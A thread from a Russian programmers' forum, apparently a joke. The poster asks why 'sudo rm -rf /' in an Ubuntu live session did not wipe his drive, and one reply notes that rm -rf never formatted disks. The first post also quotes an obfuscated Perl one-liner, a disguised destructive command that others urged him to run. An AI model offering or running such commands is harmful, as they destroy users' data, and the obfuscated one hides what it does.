Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Операционные системы > Операционные системы общие вопросы
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 03.11.2015, 22:51   #1
Ubuntu dura
Новичок
Джуниор
 
Регистрация: 03.11.2015
Сообщений: 1
По умолчанию Можно ли форматнуть винт в наше время?

Столкнулся с такой проблемой, что не могу отформатировать жесткий диск. Стоит убунту, гружусь через лайв режим, пишу sudo rm -rf /
он меня ПРЕДУПРЕЖДАЕТ об опасности, но ничего не форматирует. в связи с чем вопрос, зачем понтоваться, что это опасно, если на самом деле это не опасно , так как действие не выполняется?
далее посоветовали попробовать это
echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
сказали мол тоже самое. и действительно, опять выдал предупреждение, но ничего не форматнул. но самое интересное, что рут убунту видимо суперискуственный интеллект, который цепляется за жизнь на моем винте, лишил меня всяческих прав. И теперь, я не просто не могу форматнуть винт, я даже не могу открыть gparted
Это уже не первый форум на котором я пишу свою проблему, но никто не может предложить рабочее решение. Неужели остается только разобрать ноут и подключить ЖД к другому компу? Скучаю по временам, когда можно было зайти в дос и написать формат цэ двоеточие слэш...
Ubuntu dura вне форума Ответить с цитированием
Старый 04.11.2015, 00:08   #2
Пепел Феникса
Старожил
 
Аватар для Пепел Феникса
 
Регистрация: 28.01.2009
Сообщений: 21,000
По умолчанию

лайвы обычно не сносятся так тупо.
пробуйте с полноценной ОС на виртуалке.

PS: rm -rf / никогда и не форматировала диск.
Хорошо поставленный вопрос это уже половина ответа. | Каков вопрос, таков ответ.
Программа делает то что написал программист, а не то что он хотел.
Функции/утилиты ждут в параметрах то что им надо, а не то что вы хотите.
Пепел Феникса вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как форматнуть винт (основной) со сломанным моником (родным)? alextrof94 Windows 5 12.08.2013 16:00
В наше время возможен ли такой вид заработка? Linel Свободное общение 9 02.11.2012 16:19
Какое программирование в наше время более востребовано и более рентабельно? iukash Свободное общение 18 29.10.2009 13:02
Как форматнуть карту памяти на смарте? spamer Компьютерное железо 8 15.08.2009 17:48